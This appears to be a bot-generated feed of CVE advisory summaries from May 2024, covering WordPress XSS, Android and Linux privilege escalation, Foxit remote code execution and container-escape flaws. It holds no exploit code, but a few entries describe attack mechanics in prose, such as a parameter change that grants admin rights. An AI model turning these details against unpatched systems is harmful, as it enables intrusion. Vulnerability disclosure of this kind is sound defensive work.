🚨 CVE-2024-21793An OData injection vulnerability exists in the BIG-IP Next Central Manager API (URI). Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.🎖@cveNotify |
|
| 2024-05-08 15:37:24 |
🚨 CVE-2024-26925In the Linux kernel, the following vulnerability has been resolved:netfilter: nf_tables: release mutex after nft_gc_seq_end from abort pathThe commit mutex should not be released during the critical sectionbetween nft_gc_seq_begin() and nft_gc_seq_end(), otherwise, async GCworker could collect expired objects and get the released commit lockwithin the same GC sequence.nf_tables_module_autoload() temporarily releases the mutex to loadmodule dependencies, then it goes back to replay the transaction again.Move it at the end of the abort phase after nft_gc_seq_end() is called.🎖@cveNotify |
|
| 2024-05-08 14:37:39 |
🚨 CVE-2024-4652A vulnerability, which was classified as problematic, was found in Campcodes Complete Web-Based School Management System 1.0. Affected is an unknown function of the file /view/show_teacher2.php. The manipulation of the argument month leads to cross site scripting. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263496.🎖@cveNotify |
|
| 2024-05-08 14:37:38 |
🚨 CVE-2024-4651A vulnerability, which was classified as problematic, has been found in Campcodes Complete Web-Based School Management System 1.0. This issue affects some unknown processing of the file /view/student_attendance_history1.php. The manipulation of the argument year leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-263495.🎖@cveNotify |
|
| 2024-05-08 14:37:34 |
🚨 CVE-2024-4650A vulnerability classified as problematic was found in Campcodes Complete Web-Based School Management System 1.0. This vulnerability affects unknown code of the file /view/student_due_payment.php. The manipulation of the argument due_month leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-263494 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-08 14:37:33 |
🚨 CVE-2024-4649A vulnerability classified as problematic has been found in Campcodes Complete Web-Based School Management System 1.0. This affects an unknown part of the file /view/student_exam_mark_insert_form1.php. The manipulation of the argument page leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-263493 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-05-08 14:37:32 |
🚨 CVE-2024-33574Missing Authorization vulnerability in appsbd Vitepos.This issue affects Vitepos: from n/a through 3.0.1.🎖@cveNotify |
|
| 2024-05-08 14:37:31 |
🚨 CVE-2024-33573Missing Authorization vulnerability in EPROLO EPROLO Dropshipping.This issue affects EPROLO Dropshipping: from n/a through 1.7.1.🎖@cveNotify |
|
| 2024-05-08 14:37:27 |
🚨 CVE-2024-32886Vitess is a database clustering system for horizontal scaling of MySQL. When executing the following simple query, the `vtgate` will go into an endless loop that also keeps consuming memory and eventually will run out of memory. This vulnerability is fixed in 19.0.4, 18.0.5, and 17.0.7.🎖@cveNotify |
|
| 2024-05-08 14:37:26 |
🚨 CVE-2024-31270Missing Authorization vulnerability in Repute InfoSystems ARForms Form Builder.This issue affects ARForms Form Builder: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-05-08 14:37:25 |
🚨 CVE-2024-24833Missing Authorization vulnerability in Leevio Happy Addons for Elementor.This issue affects Happy Addons for Elementor: from n/a through 3.10.1.🎖@cveNotify |
|
| 2024-05-08 14:37:24 |
🚨 CVE-2022-21819NVIDIA distributions of Jetson Linux contain a vulnerability where an error in the IOMMU configuration may allow an unprivileged attacker with physical access to the board direct read/write access to the entire system address space through the PCI bus. Such an attack could result in denial of service, code execution, escalation of privileges, and impact to data integrity and confidentiality. The scope impact may extend to other components.🎖@cveNotify |
|
| 2024-05-08 13:37:45 |
🚨 CVE-2024-23713In migrateNotificationFilter of NotificationManagerService.java, there is a possible failure to persist notifications settings due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:44 |
🚨 CVE-2024-23710In assertPackageWithSharedUserIdIsPrivileged of InstallPackageHelper.java, there is a possible execution of arbitrary app code as a privileged app due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:43 |
🚨 CVE-2024-23709In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:40 |
🚨 CVE-2024-23708In multiple functions of NotificationManagerService.java, there is a possible way to not show a toast message when a clipboard message has been accessed. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:39 |
🚨 CVE-2024-23706In multiple locations, there is a possible bypass of health data permissions due to an improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:38 |
🚨 CVE-2024-23704In onCreate of WifiDialogActivity.java, there is a possible way to bypass the DISALLOW_ADD_WIFI_CONFIG restriction due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:34 |
🚨 CVE-2024-0043In multiple locations, there is a possible notification listener grant to an app running in the work profile due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:33 |
🚨 CVE-2024-0027In multiple functions of SnoozeHelper.java, there is a possible way to cause a boot loop due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:32 |
🚨 CVE-2024-0026In multiple functions of SnoozeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:31 |
🚨 CVE-2024-0025In sendIntentSender of ActivityManagerService.java, there is a possible background activity launch due to a logic error. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:27 |
🚨 CVE-2024-0022In multiple functions of CompanionDeviceManagerService.java, there is a possible launch NotificationAccessConfirmationActivity of another user profile due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-08 13:37:26 |
🚨 CVE-2024-31115Unrestricted Upload of File with Dangerous Type vulnerability in QuanticaLabs Chauffeur Taxi Booking System for WordPress.This issue affects Chauffeur Taxi Booking System for WordPress: from n/a through 7.2.🎖@cveNotify |
|
| 2024-05-08 13:37:25 |
🚨 CVE-2023-6240A Marvin vulnerability side-channel leakage was found in the RSA decryption operation in the Linux Kernel. This issue may allow a network attacker to decrypt ciphertexts or forge signatures, limiting the services that use that private key.🎖@cveNotify |
|
| 2024-05-08 12:37:33 |
🚨 CVE-2024-4644A vulnerability has been found in SourceCodester Prison Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file /Employee/changepassword.php. The manipulation of the argument txtold_password/txtnew_password/txtconfirm_password leads to cross site scripting. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-263488.🎖@cveNotify |
|
| 2024-05-08 12:37:32 |
🚨 CVE-2024-34561Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Creative interactive media 3D FlipBook, PDF Viewer, PDF Embedder – Real 3D FlipBook WordPress Plugin allows Stored XSS.This issue affects 3D FlipBook, PDF Viewer, PDF Embedder – Real 3D FlipBook WordPress Plugin: from n/a through 3.71.🎖@cveNotify |
|
| 2024-05-08 12:37:31 |
🚨 CVE-2024-34558Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in realmag777 WOLF allows Stored XSS.This issue affects WOLF: from n/a through 1.0.8.2.🎖@cveNotify |
|
| 2024-05-08 12:37:30 |
🚨 CVE-2024-34553Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Select-Themes Stockholm Core allows Reflected XSS.This issue affects Stockholm Core: from n/a through 2.4.1.🎖@cveNotify |
|
| 2024-05-08 12:37:26 |
🚨 CVE-2024-34547Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Noor alam Magical Addons For Elementor allows Stored XSS.This issue affects Magical Addons For Elementor: from n/a through 1.1.34.🎖@cveNotify |
|
| 2024-05-08 12:37:25 |
🚨 CVE-2024-34414Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nobita allows Stored XSS.This issue affects raindrops: from n/a through 1.600.🎖@cveNotify |
|
| 2024-05-08 12:37:24 |
🚨 CVE-2022-40218Missing Authorization vulnerability in ThemeHunk Advance WordPress Search Plugin.This issue affects Advance WordPress Search Plugin: from n/a through 1.1.4.🎖@cveNotify |
|
| 2024-05-08 11:37:33 |
🚨 CVE-2024-34570Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Xpro Xpro Elementor Addons allows Stored XSS.This issue affects Xpro Elementor Addons: from n/a through 1.4.3.🎖@cveNotify |
|
| 2024-05-08 11:37:32 |
🚨 CVE-2024-34569Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Katie Seaborn Zotpress allows Stored XSS.This issue affects Zotpress: from n/a through 7.3.9.🎖@cveNotify |
|
| 2024-05-08 11:37:31 |
🚨 CVE-2024-34568Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Themeqx LetterPress allows Stored XSS.This issue affects LetterPress: from n/a through 1.2.1.🎖@cveNotify |
|
| 2024-05-08 11:37:27 |
🚨 CVE-2024-34565Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Debug Info allows Stored XSS.This issue affects Debug Info: from n/a through 1.3.10.🎖@cveNotify |
|
| 2024-05-08 11:37:26 |
🚨 CVE-2024-34564Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in LogicHunt Inc. Counter Up allows Stored XSS.This issue affects Counter Up: from n/a through 2.2.1.🎖@cveNotify |
|
| 2024-05-08 11:37:25 |
🚨 CVE-2024-34563Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in GoldAddons Gold Addons for Elementor allows Stored XSS.This issue affects Gold Addons for Elementor: from n/a through 1.2.9.🎖@cveNotify |
|
| 2024-05-08 11:37:24 |
🚨 CVE-2024-34562Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Moveaddons Move Addons for Elementor allows Stored XSS.This issue affects Move Addons for Elementor: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-05-08 10:37:26 |
🚨 CVE-2024-4281The Link Library plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'link-library' shortcode in all versions up to, and including, 7.6.11 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-08 10:37:25 |
🚨 CVE-2024-34572Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemePrix Fancy Elementor Flipbox fancy-elementor-flipbox allows Stored XSS.This issue affects Fancy Elementor Flipbox: from n/a through 2.4.2.🎖@cveNotify |
|
| 2024-05-08 10:37:24 |
🚨 CVE-2024-34571Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in ThemeGrill Himalayas allows Stored XSS.This issue affects Himalayas: from n/a through 1.3.0.🎖@cveNotify |
|
| 2024-05-08 09:37:32 |
🚨 CVE-2024-4437The etcd package distributed with the Red Hat OpenStack platform has an incomplete fix for CVE-2021-44716. This issue occurs because the etcd package in the Red Hat OpenStack platform is using http://golang.org/x/net/http2 instead of the one provided by Red Hat Enterprise Linux versions, meaning it should be updated at compile time instead.🎖@cveNotify |
|
| 2024-05-08 09:37:31 |
🚨 CVE-2024-34574Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpsoul Table Maker allows Stored XSS.This issue affects Table Maker: from n/a through 1.9.1.🎖@cveNotify |
|
| 2024-05-08 09:37:30 |
🚨 CVE-2024-34573Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Pootlepress Pootle Pagebuilder – WordPress Page builder allows Stored XSS.This issue affects Pootle Pagebuilder – WordPress Page builder: from n/a through 5.7.1.🎖@cveNotify |
|
| 2024-05-08 09:37:26 |
🚨 CVE-2024-28148An authenticated user could potentially access metadata for a datasource they are not authorized to view by submitting a targeted REST API request.This issue affects Apache Superset: before 3.1.2.Users are recommended to upgrade to version 3.1.2 or above, which fixes the issue.🎖@cveNotify |
|
| 2024-05-08 09:37:25 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-05-08 09:37:24 |
🚨 CVE-2023-4194A flaw was found in the Linux kernel's TUN/TAP functionality. This issue could allow a local user to bypass network filters and gain unauthorized access to some resources. The original patches fixing CVE-2023-1076 are incorrect or incomplete. The problem is that the following upstream commits - a096ccca6e50 ("tun: tun_chr_open(): correctly initialize socket uid"), - 66b2c338adce ("tap: tap_open(): correctly initialize socket uid"), pass "inode->i_uid" to sock_init_data_uid() as the last parameter and that turns out to not be accurate.🎖@cveNotify |
|
| 2024-05-08 08:37:25 |
🚨 CVE-2024-1488A vulnerability was found in Unbound due to incorrect default permissions, allowing any process outside the unbound group to modify the unbound runtime configuration. If a process can connect over localhost to port 8953, it can alter the configuration of unbound.service. This flaw allows an unprivileged attacker to manipulate a running instance, potentially altering forwarders, allowing them to track all queries forwarded by the local resolver, and, in some cases, disrupting resolving altogether.🎖@cveNotify |
|
| 2024-05-08 08:37:24 |
🚨 CVE-2023-6546A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.🎖@cveNotify |
|
| 2024-05-08 06:37:25 |
🚨 CVE-2024-3494The Mesmerize Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mesmerize_contact_form' shortcode in all versions up to, and including, 1.6.148 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-05-08 06:37:24 |
🚨 CVE-2024-1076The SSL Zen WordPress plugin before 4.6.0 only relies on the use of .htaccess to prevent visitors from accessing the site's generated private keys, which allows an attacker to read them if the site runs on a server who doesn't support .htaccess files, like NGINX.🎖@cveNotify |
|
| 2024-05-08 04:37:32 |
🚨 CVE-2024-32674Heateor Social Login WordPress prior to 1.1.32 contains a cross-site scripting vulnerability. If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who accessed the website using the product.🎖@cveNotify |
|
| 2024-05-08 04:37:31 |
🚨 CVE-2024-22264VMware Avi Load Balancer contains a privilege escalation vulnerability. A malicious actor with admin privileges on VMware Avi Load Balancer can create, modify, execute and delete files as a root user on the host system.🎖@cveNotify |
|
| 2024-05-08 03:37:26 |
🚨 CVE-2024-4418A race condition leading to a stack use-after-free flaw was found in libvirt. Due to a bad assumption in the virNetClientIOEventLoop() method, the `data` pointer to a stack-allocated virNetClientIOEventData structure ended up being used in the virNetClientIOEventFD callback while the data pointer's stack frame was concurrently being "freed" when returning from virNetClientIOEventLoop(). The 'virtproxyd' daemon can be used to trigger requests. If libvirt is configured with fine-grained access control, this issue, in theory, allows a user to escape their otherwise limited access. This flaw allows a local, unprivileged user to access virtproxyd without authenticating. Remote users would need to authenticate before they could access it.🎖@cveNotify |
|
| 2024-05-08 03:37:25 |
🚨 CVE-2024-4162A buffer error in Panasonic KW Watcher versions 1.00 through 2.83 may allow attackers malicious read access to memory.🎖@cveNotify |
|
| 2024-05-08 03:37:24 |
🚨 CVE-2023-3758A race condition flaw was found in sssd where the GPO policy is not consistently applied for authenticated users. This may lead to improper authorization issues, granting or denying access to resources inappropriately.🎖@cveNotify |
|
| 2024-05-08 02:37:30 |
🚨 CVE-2024-2746Incomplete fix for CVE-2024-1929The problem with CVE-2024-1929 was that the dnf5 D-Bus daemon accepted arbitrary configuration parameters from unprivileged users, which allowed alocal root exploit by tricking the daemon into loading a user controlled "plugin". All of this happened before Polkit authentication was even started.The dnf5 library code does not check whether non-root users control the directory in question. On one hand, this poses a Denial-of-Service attack vector by making the daemonoperate on a blocking file (e.g. named FIFO special file) or a very large filethat causes an out-of-memory situation (e.g. /dev/zero). On the other hand, this can be used to let the daemon process privileged files like /etc/shadow.The file in question is parsed as an INI file. Error diagnostics resulting from parsing privileged files could cause information leaks, if these diagnosticsare accessible to unprivileged users. In the case of libdnf5, no such user accessible diagnostics should exist, though.Also, a local attacker can place a valid repository configuration file in this directory. This configuration file allows to specifya plethora of additional configuration options. This makes various additional code paths in libdnf5 accessible to the attacker.🎖@cveNotify |
|
| 2024-05-08 02:37:29 |
🚨 CVE-2024-1930No Limit on Number of Open Sessions / Bad Session Close Behaviour in dnf5daemon-server before 5.1.17 allows a malicious user to impact Availability via No Limit on Number of Open Sessions.There is no limit on how many sessions D-Bus clients may create using the `open_session()` D-Bus method. For each session a thread is created in dnf5daemon-server. This spends a couple of hundred megabytes of memory in the process. Further connections will become impossible, likely because no more threads can be spawned by the D-Bus service.🎖@cveNotify |
|
| 2024-05-08 02:37:26 |
🚨 CVE-2024-1929Local Root Exploit via Configuration Dictionary in dnf5daemon-server before 5.1.17 allows a malicious user to impact Confidentiality and Integrity via Configuration Dictionary.There are issues with the D-Bus interface long before Polkit is invoked. The `org.rpm.dnf.v0.SessionManager.open_session` method takes a key/value map of configuration entries. A sub-entry in this map, placed under the "config" key, is another key/value map. The configuration values found in it will be forwarded as configuration overrides to the `libdnf5::Base` configuration. Practically all libdnf5 configuration aspects can be influenced here. Already when opening the session via D-Bus, the libdnf5 will be initialized using these override configuration values. There is no sanity checking of the content of this "config" map, which is untrusted data. It is possible to make the library loading a plug-in shared library under control of an unprivileged user, hence achieving root access.🎖@cveNotify |
|
| 2024-05-08 02:37:25 |
🚨 CVE-2024-1753A flaw was found in Buildah (and subsequently Podman Build) which allows containers to mount arbitrary locations on the host filesystem into build containers. A malicious Containerfile can use a dummy image with a symbolic link to the root filesystem as a mount source and cause the mount operation to mount the host root filesystem inside the RUN step. The commands inside the RUN step will then have read-write access to the host filesystem, allowing for full container escape at build time.🎖@cveNotify |
|
| 2024-05-08 02:37:24 |
🚨 CVE-2024-1725A flaw was found in the kubevirt-csi component of OpenShift Virtualization's Hosted Control Plane (HCP). This issue could allow an authenticated attacker to gain access to the root HCP worker node's volume by creating a custom Persistent Volume that matches the name of a worker node.🎖@cveNotify |
|
| 2024-05-08 01:37:25 |
🚨 CVE-2024-3096In PHP version 8.1.* before 8.1.28, 8.2.* before 8.2.18, 8.3.* before 8.3.5, if a password stored with password_hash() starts with a null byte (\x00), testing a blank string as the password via password_verify() will incorrectly return true.🎖@cveNotify |
|
| 2024-05-08 01:37:24 |
🚨 CVE-2024-2756Due to an incomplete fix to CVE-2022-31629 https://github.com/advisories/GHSA-c43m-486j-j32p , network and same-site attackers can set a standard insecure cookie in the victim's browser which is treated as a __Host- or __Secure- cookie by PHP applications.🎖@cveNotify |
|
| 2024-05-07 23:37:42 |
🚨 CVE-2021-34965Foxit PDF Editor Squiggly Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14361.🎖@cveNotify |
|
| 2024-05-07 23:37:41 |
🚨 CVE-2021-34962Foxit PDF Editor Caret Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14364.🎖@cveNotify |
|
| 2024-05-07 23:37:36 |
🚨 CVE-2021-34960Foxit PDF Editor Circle Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14362.🎖@cveNotify |
|
| 2024-05-07 23:37:35 |
🚨 CVE-2021-34957Foxit PDF Editor Highlight Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14358.🎖@cveNotify |
|
| 2024-05-07 23:37:31 |
🚨 CVE-2021-34955Foxit PDF Editor Stamp Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Editor. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14356.🎖@cveNotify |
|
| 2024-05-07 23:37:30 |
🚨 CVE-2021-34953Foxit PDF Reader Annotation Use of Uninitialized Variable Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14658.🎖@cveNotify |
|
| 2024-05-07 23:37:29 |
🚨 CVE-2021-34952Foxit PDF Reader Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14729.🎖@cveNotify |
|
| 2024-05-07 23:37:26 |
🚨 CVE-2021-34951Foxit PDF Reader Annotation Use of Uninitialized Variable Information Disclosure Vulnerability. This vulnerability allows remote attackers to disclose sensitive information on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Annotation objects. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this in conjunction with other vulnerabilities to execute arbitrary code in the context of the current process. Was ZDI-CAN-14395.🎖@cveNotify |
|
| 2024-05-07 23:37:25 |
🚨 CVE-2021-34948Foxit PDF Reader Square Annotation Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit PDF Reader. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the handling of Square annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-14272.🎖@cveNotify |
|
| 2024-05-07 23:37:24 |
🚨 CVE-2021-34947NETGEAR R7800 net-cgi Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of NETGEAR R7800 routers. Authentication is not required to exploit this vulnerability.The specific flaw exists within the parsing of the soap_block_table file. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated data structure. An attacker can leverage this vulnerability to execute code in the context of root.. Was ZDI-CAN-13055.🎖@cveNotify |
|
| 2024-05-07 22:37:26 |
🚨 CVE-2024-23551Database scanning using username and password stores the credentials in plaintext or encoded format within files at the endpoint. This has been identified as a significant security risk. This will lead to exposure of sensitive information for unauthorized access, potentially leading to severe consequences such as data breaches, unauthorized data manipulation, and compromised system integrity.🎖@cveNotify |
|
| 2024-05-07 22:37:25 |
🚨 CVE-2024-0450An issue was found in the CPython `zipfile` module affecting versions 3.12.1, 3.11.7, 3.10.13, 3.9.18, and 3.8.18 and prior.The zipfile module is vulnerable to “quoted-overlap” zip-bombs which exploit the zip format to create a zip-bomb with a high compression ratio. The fixed versions of CPython makes the zipfile module reject zip archives which overlap entries in the archive.🎖@cveNotify |
|
| 2024-05-07 22:37:24 |
🚨 CVE-2023-6507An issue was found in CPython 3.12.0 `subprocess` module on POSIX platforms. The issue was fixed in CPython 3.12.1 and does not affect other stable releases.When using the `extra_groups=` parameter with an empty list as a value (ie `extra_groups=[]`) the logic regressed to not call `setgroups(0, NULL)` before calling `exec()`, thus not dropping the original processes' groups before starting the new process. There is no issue when the parameter isn't used or when any value is used besides an empty list.This issue only impacts CPython processes run with sufficient privilege to make the `setgroups` system call (typically `root`).🎖@cveNotify |
|
| 2024-05-07 21:37:42 |
🚨 CVE-2024-23712In multiple functions of AppOpsService.java, there is a possible way to saturate the content of /data/system/appops_accesses.xml due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:41 |
🚨 CVE-2024-23709In multiple locations, there is a possible out of bounds write due to a heap buffer overflow. This could lead to remote information disclosure with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:40 |
🚨 CVE-2024-23708In multiple functions of NotificationManagerService.java, there is a possible way to not show a toast message when a clipboard message has been accessed. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:37 |
🚨 CVE-2024-23707In multiple locations, there is a possible permissions bypass due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:36 |
🚨 CVE-2024-23704In onCreate of WifiDialogActivity.java, there is a possible way to bypass the DISALLOW_ADD_WIFI_CONFIG restriction due to a missing permission check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:35 |
🚨 CVE-2024-0043In multiple locations, there is a possible notification listener grant to an app running in the work profile due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:32 |
🚨 CVE-2024-0042In TBD of TBD, there is a possible confusion of OEM and DRM certificates due to improperly used crypto. This could lead to local bypass of DRM content protection with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:31 |
🚨 CVE-2024-0026In multiple functions of SnoozeHelper.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to local denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:30 |
🚨 CVE-2024-0024In multiple methods of UserManagerService.java, there is a possible failure to persist or enforce user restrictions due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.🎖@cveNotify |
|
| 2024-05-07 21:37:26 |
🚨 CVE-2023-40694IBM Watson CP4D Data Stores 4.0.0 through 4.8.4 stores potentially sensitive information in log files that could be read by a local user. IBM X-Force ID: 264838.🎖@cveNotify |
|
| 2024-05-07 21:37:25 |
🚨 CVE-2023-31082An issue was discovered in drivers/tty/n_gsm.c in the Linux kernel 6.2. There is a sleeping function called from an invalid context in gsmld_write, which will block the kernel. Note: This has been disputed by 3rd parties as not a valid vulnerability.🎖@cveNotify |
|
| 2024-05-07 21:37:24 |
🚨 CVE-2022-42969The py library through 1.11.0 for Python allows remote attackers to conduct a ReDoS (Regular expression Denial of Service) attack via a Subversion repository with crafted info data, because the InfoSvnCommand argument is mishandled. Note: This has been disputed by multiple third parties as not being reproduceable and they argue this is not a valid vulnerability.🎖@cveNotify |
|
| 2024-05-07 20:37:42 |
🚨 CVE-2024-32867Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.5 and 6.0.19, various problems in handling of fragmentation anomalies can lead to mis-detection of rules and policy. This vulnerability is fixed in 7.0.5 or 6.0.19.🎖@cveNotify |
|
| 2024-05-07 20:37:41 |
🚨 CVE-2024-32663Suricata is a network Intrusion Detection System, Intrusion Prevention System and Network Security Monitoring engine. Prior to 7.0.5 and 6.0.19, a small amount of HTTP/2 traffic can lead to Suricata using a large amount of memory. The issue has been addressed in Suricata 7.0.5 and 6.0.19. Workarounds include disabling the HTTP/2 parser and reducing `app-layer.protocols.http2.max-table-size` value (default is 65536).🎖@cveNotify |
|
| 2024-05-07 20:37:40 |
🚨 CVE-2024-32371An issue in HSC Cybersecurity HC Mailinspector 5.2.17-3 through 5.2.18 allows a regular user account to escalate their privileges and gain administrative access by changing the type parameter from 1 to 0.🎖@cveNotify |
|
| 2024-05-07 20:37:37 |
